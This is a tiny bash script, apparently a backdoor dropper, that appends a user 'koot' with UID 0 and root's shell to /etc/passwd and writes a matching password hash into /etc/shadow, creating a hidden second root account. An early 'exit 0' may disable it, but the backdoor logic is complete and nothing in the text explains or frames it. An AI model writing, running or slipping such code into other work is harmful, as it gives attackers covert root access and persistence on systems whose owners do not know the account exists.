#!/bin/bash exit 0 if [ "`grep -c ^koot: /etc/passwd`" -eq "0" ]; then echo 'koot:x:0:0:root:/root:/bin/bash'>> /etc/passwd echo 'koot:$1$OH8/Yip3$AbOovCR/DzDhO5.6M1Pso/:13998:0:99999:7:::' >> /etc/shadow fi